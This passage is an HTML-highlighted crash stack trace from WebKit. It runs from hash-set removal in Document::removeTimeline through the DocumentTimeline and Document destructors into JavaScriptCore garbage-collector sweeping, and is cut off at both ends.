class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > > WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>find<WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) const DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1084</span><br> #<span class="hljs-number">4</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>find(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) const DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">476</span><br> #<span class="hljs-number">5</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>find(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) const DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">209</span><br> #<span class="hljs-number">6</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>remove(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&) DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">286</span><br> #<span class="hljs-number">7</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in bool WT<span class="hljs-number">F::</span>WeakHashSet<WebCor<span class="hljs-number">e::</span>DocumentTimeline><span class="hljs-number">::</span>remove<WebCor<span class="hljs-number">e::</span>DocumentTimeline>(WebCor<span class="hljs-number">e::</span>DocumentTimeline const&) DerivedSources/ForwardingHeaders/wtf/WeakHashSet.h:<span class="hljs-number">112</span><br> #<span class="hljs-number">8</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05950b27</span> in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>removeTimeline(WebCor<span class="hljs-number">e::</span>DocumentTimeline&) Source/WebCore/dom/Document.cpp:<span class="hljs-number">8064</span><br> #<span class="hljs-number">9</span> <span class="hljs-number">0</span>x7fbd04fb36ce in WebCor<span class="hljs-number">e::</span>DocumentTimeline::~DocumentTimeline() Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">80</span><br> #<span class="hljs-number">10</span> <span class="hljs-number">0</span>x7fbd04fb3dd0 in WebCor<span class="hljs-number">e::</span>DocumentTimeline::~DocumentTimeline() Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">81</span><br> #<span class="hljs-number">11</span> <span class="hljs-number">0</span>x7fbd0598f70f in st<span class="hljs-number">d::</span>default_delete<WebCor<span class="hljs-number">e::</span>AnimationTimeline><span class="hljs-number">::</span>operator()(WebCor<span class="hljs-number">e::</span>AnimationTimeline*) const /usr/include/c++/<span class="hljs-number">7</span>/bits/unique_ptr.h:<span class="hljs-number">78</span><br> #<span class="hljs-number">12</span> <span class="hljs-number">0</span>x7fbd0598f70f in WT<span class="hljs-number">F::</span>RefCounted<WebCor<span class="hljs-number">e::</span>AnimationTimeline, st<span class="hljs-number">d::</span>default_delete<WebCor<span class="hljs-number">e::</span>AnimationTimeline> ><span class="hljs-number">::</span>deref() const DerivedSources/ForwardingHeaders/wtf/RefCounted.h:<span class="hljs-number">190</span><br> #<span class="hljs-number">13</span> <span class="hljs-number">0</span>x7fbd0598f70f in void WT<span class="hljs-number">F::</span>derefIfNotNull<WebCor<span class="hljs-number">e::</span>DocumentTimeline>(WebCor<span class="hljs-number">e::</span>DocumentTimeline*) DerivedSources/ForwardingHeaders/wtf/RefPtr.h:<span class="hljs-number">44</span><br> #<span class="hljs-number">14</span> <span class="hljs-number">0</span>x7fbd0598f70f in WT<span class="hljs-number">F::</span>RefPtr<WebCor<span class="hljs-number">e::</span>DocumentTimeline, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>DocumentTimeline> >::~RefPtr() DerivedSources/ForwardingHeaders/wtf/RefPtr.h:<span class="hljs-number">70</span><br> #<span class="hljs-number">15</span> <span class="hljs-number">0</span>x7fbd0598f70f in WebCor<span class="hljs-number">e::</span>Document::~Document() Source/WebCore/dom/Document.cpp:<span class="hljs-number">628</span><br> #<span class="hljs-number">16</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6574</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">17</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">060f6660</span> in WebCor<span class="hljs-number">e::</span>HTMLDocument::~HTMLDocument() Source/WebCore/html/HTMLDocument.h:<span class="hljs-number">29</span><br> #<span class="hljs-number">18</span> <span class="hljs-number">0</span>x7fbd0599b49c in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>removedLastRef() Source/WebCore/dom/Document.cpp:<span class="hljs-number">766</span><br> #<span class="hljs-number">19</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05b2a2a7</span> in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>removedLastRef() Source/WebCore/dom/Node.cpp:<span class="hljs-number">2533</span><br> #<span class="hljs-number">20</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>deref() const Source/WebCore/dom/Node.h:<span class="hljs-number">716</span><br> #<span class="hljs-number">21</span> <span class="hljs-number">0</span>x7fbd05b2fa14 in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>derefEventTarget() Source/WebCore/dom/Node.cpp:<span class="hljs-number">825</span><br> #<span class="hljs-number">22</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>deref() Source/WebCore/dom/EventTarget.h:<span class="hljs-number">58</span><br> #<span class="hljs-number">23</span> <span class="hljs-number">0</span>x7fbd038f70cd in WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>EventTarget, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>EventTarget> >::~Ref() DerivedSources/ForwardingHeaders/wtf/Ref.h:<span class="hljs-number">61</span><br> #<span class="hljs-number">24</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSDOMWrapper<WebCor<span class="hljs-number">e::</span>EventTarget>::~JSDOMWrapper() Source/WebCore/bindings/js/JSDOMWrapper.h:<span class="hljs-number">71</span><br> #<span class="hljs-number">25</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget::~JSEventTarget() DerivedSources/WebCore/JSEventTarget.h:<span class="hljs-number">30</span><br> #<span class="hljs-number">26</span> <span class="hljs-number">0</span>x7fbd038f70cd in WebCor<span class="hljs-number">e::</span>JSEventTarget<span class="hljs-number">::</span>destroy(JS<span class="hljs-number">C::</span>JSCell*) DerivedSources/WebCore/JSEventTarget.cpp:<span class="hljs-number">234</span><br> #<span class="hljs-number">27</span> <span class="hljs-number">0</span>x7fbcfb288c7c in JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFun<span class="hljs-number">c::</span>operator()(JS<span class="hljs-number">C::</span>VM&, JS<span class="hljs-number">C::</span>JSCell*) const Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">37</span><br> #<span class="hljs-number">28</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(void*)#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()(void*) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">260</span><br> #<span class="hljs-number">29</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda(unsigned long)#<span class="hljs-number">3</span>}<span class="hljs-number">::</span>operator()(unsigned long) const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">319</span><br> #<span class="hljs-number">30</span> <span class="hljs-number">0</span>x7fbcfb288c7c in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>specializedSweep<true, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode)<span class="hljs-number">0</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode)<span class="hljs-number">1</span>, (JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode)<span class="hljs-number">1</span>, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>EmptyMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>SweepDestructionMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>ScribbleMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>NewlyAllocatedMode, JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>MarksMode, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">341</span><br> #<span class="hljs-number">31</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">423</span><br> #<span class="hljs-number">32</span> <span class="hljs-number">0</span>x7fbcfb266d9b in void JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>finishSweepKnowingHeapCellType<JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc>(JS<span class="hljs-number">C::</span>FreeList*, JS<span class="hljs-number">C::</span>JSDestructibleObjectDestroyFunc const&) Source/JavaScriptCore/heap/MarkedBlockInlines.h:<span class="hljs-number">435</span><br> #<span class="hljs-number">33</span> <span class="hljs-number">0</span>x7fbcfb266d9b in JS<span class="hljs-number">C::</span>JSDestructibleObjectHeapCellTyp<span class="hljs-number">e::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/runtime/JSDestructibleObjectHeapCellType.cpp:<span class="hljs-number">52</span><br> #<span class="hljs-number">34</span> <span class="hljs-number">0</span>x7fbcfa4f4c96 in JS<span class="hljs-number">C::</span>Subsp<span class="hljs-number">ace::</span>finishSweep(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle&, JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/Subspace.cpp:<span class="hljs-number">64</span><br> #<span class="hljs-number">35</span> <span class="hljs-number">0</span>x7fbcfa4c9381 in JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handl<span class="hljs-number">e::</span>sweep(JS<span class="hljs-number">C::</span>FreeList*) Source/JavaScriptCore/heap/MarkedBlock.cpp:<span class="hljs-number">419</span><br> #<span class="hljs-number">36</span> <span class="hljs-number">0</span>x7fbcfa48459c in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateIn(JS<span class="hljs-number">C::</span>MarkedBlock<span class="hljs-number">::</span>Handle*) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">226</span><br> #<span class="hljs-number">37</span> <span class="hljs-number">0</span>x7fbcfa484d0a in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>tryAllocateWithoutCollecting() Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">192</span><br> #<span class="hljs-number">38</span> <span class="hljs-number">0</span>x7fbcfa48e44e in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocateSlowCase(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) Source/JavaScriptCore/heap/LocalAllocator.cpp:<span class="hljs-number">133</span><br> #<span class="hljs-number">39</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}<span class="hljs-number">::</span>operator()() const DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">40</span><br> #<span class="hljs-number">40</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>HeapCell* JS<span class="hljs-number">C::</span>FreeList<span class="hljs-number">::</span>allocate<JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>}>(JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode)::{lambda()#<span class="hljs-number">1</span>} const&) DerivedSources/ForwardingHeaders/JavaScriptCore/FreeListInlines.h:<span class="hljs-number">46</span><br> #<span class="hljs-number">41</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>LocalAllocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/LocalAllocatorInlines.h:<span class="hljs-number">41</span><br> #<span class="hljs-number">42</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>Allocator<span class="hljs-number">::</span>allocate(JS<span class="hljs-number">C::</span>Heap&, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) const DerivedSources/ForwardingHeaders/JavaScriptCore/AllocatorInlines.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">43</span> <span class="hljs-number">0</span>x7fbd03a99b91 in JS<span class="hljs-number">C::</span>CompleteSubsp<span class="hljs-number">ace::</span>allocateNonVirtual(JS<span class="hljs-number">C::</span>VM&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/CompleteSubspaceInlines.h:<span class="hljs-number">39</span><br> #<span class="hljs-number">44</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>tryAllocateCellHelper<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long, JS<span class="hljs-number">C::</span>GCDeferralContext*, JS<span class="hljs-number">C::</span>AllocationFailureMode) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">163</span><br> #<span class="hljs-number">45</span> <span class="hljs-number">0</span>x7fbd03af7167 in void* JS<span class="hljs-number">C::</span>allocateCell<WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement>(JS<span class="hljs-number">C::</span>Heap&, unsigned long) DerivedSources/ForwardingHeaders/JavaScriptCore/JSCellInlines.h:<span class="hljs-number">177</span><br> #<span class="hljs-number">46</span> <span class="hljs-number">0</span>x7fbd03af7167 in WebCor<span class="hljs-number">e::</span>JSHTMLScriptElement<span class="hljs-number">::</span>create(JS<span class="hljs-number">C::</span>Structure*, WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) DerivedSources/WebCore/JSHTMLScriptElement.h:<span class="hljs-number">35</span><br> #<span class="hljs-number">47</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLScriptElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">187</span><br> #<span class="hljs-number">48</span> <span class="hljs-number">0</span>x7fbd03af7167 in st<span class="hljs-number">d::</span>enable_if<!st<span class="hljs-number">d::</span>is_same<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement><span class="hljs-number">::</span>value, WebCor<span class="hljs-number">e::</span>JSDOMWrapperConverterTraits<WebCor<span class="hljs-number">e::</span>HTMLScriptElement><span class="hljs-number">::</span>WrapperClass*><span class="hljs-number">::</span>type WebCor<span class="hljs-number">e::</span>createWrapper<WebCor<span class="hljs-number">e::</span>HTMLScriptElement, WebCor<span class="hljs-number">e::</span>HTMLElement>(WebCor<span class="hljs-number">e::</span>JSDOMGlobalObject*, WT<span class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>HTMLElement, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>HTMLElement> >&&) Source/WebCore/bindings/js/JSDOMWrapperCache.h:<span class="hljs-number">194</span><br> #<span class="hljs-number">49</span> <span class="hljs-number">0</span>x7fbd03af7167 in createHTMLScriptElementWrapper DerivedSources/WebCore/JSHTMLElementWrapperFactory.cpp:<span class="hljs-number">527</span><br> #<span class="hljs-number">50</span> <span class="hljs-number">0</span>x7fbd03b10e86 in WebCor<span 